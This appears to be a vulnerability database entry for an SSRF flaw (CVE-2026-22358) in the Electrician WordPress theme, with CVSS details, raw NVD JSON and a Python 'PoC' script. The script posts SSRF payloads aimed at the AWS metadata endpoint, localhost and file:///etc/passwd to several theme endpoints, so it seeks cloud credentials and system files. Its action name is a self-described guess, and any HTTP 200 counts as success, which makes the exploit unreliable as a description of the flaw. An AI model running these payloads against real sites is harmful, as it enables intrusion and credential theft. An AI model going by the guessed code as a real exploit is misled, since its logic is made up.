Security Vulnerability Report
中文
CVE-2026-22358 CVSS 5.4 MEDIUM

CVE-2026-22358

Published: 2026-01-22 17:16:32
Last Modified: 2026-04-15 00:35:42

Description

Server-Side Request Forgery (SSRF) vulnerability in SmartDataSoft Electrician - Electrical Service WordPress electrician allows Server Side Request Forgery.This issue affects Electrician - Electrical Service WordPress: from n/a through <= 5.6.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Electrician - Electrical Service WordPress Theme <= 5.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-22358 SSRF PoC for WordPress Electrician Theme # Target: SmartDataSoft Electrician WordPress Theme <= 5.6 def check_ssrf(target_url): """ Check for SSRF vulnerability in Electrician theme """ # Common vulnerable endpoints in WordPress themes endpoints = [ '/wp-admin/admin-ajax.php', '/wp-content/themes/electrician/inc/', '/wp-content/themes/electrician/' ] # Test payload - try to access internal service ssrf_payloads = [ 'http://127.0.0.1/', 'http://localhost/', 'http://169.254.169.254/latest/meta-data/', # AWS metadata 'file:///etc/passwd' ] for endpoint in endpoints: for payload in ssrf_payloads: try: data = { 'action': 'electrician_ssrf_action', # Likely vulnerable action 'url': payload, 'request_url': payload } response = requests.post(target_url + endpoint, data=data, timeout=5) # Check for signs of SSRF success if response.status_code == 200: print(f"[+] Potential SSRF found at {endpoint}") print(f"[+] Payload: {payload}") print(f"[+] Response length: {len(response.text)}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2026-22358.py <target_url>") print("Example: python cve-2026-22358.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') print(f"[*] Scanning {target} for CVE-2026-22358 SSRF...") check_ssrf(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22358", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:31.850", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in SmartDataSoft Electrician - Electrical Service WordPress electrician allows Server Side Request Forgery.This issue affects Electrician - Electrical Service WordPress: from n/a through <= 5.6."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición del lado del servidor (SSRF) en SmartDataSoft Electrician - Electrical Service WordPress electrician permite falsificación de petición del lado del servidor. Este problema afecta a Electrician - Electrical Service WordPress: desde n/a hasta &lt;= 5.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/electrician/vulnerability/wordpress-electrician-electrical-service-wordpress-theme-5-6-server-side-request-forgery-ssrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}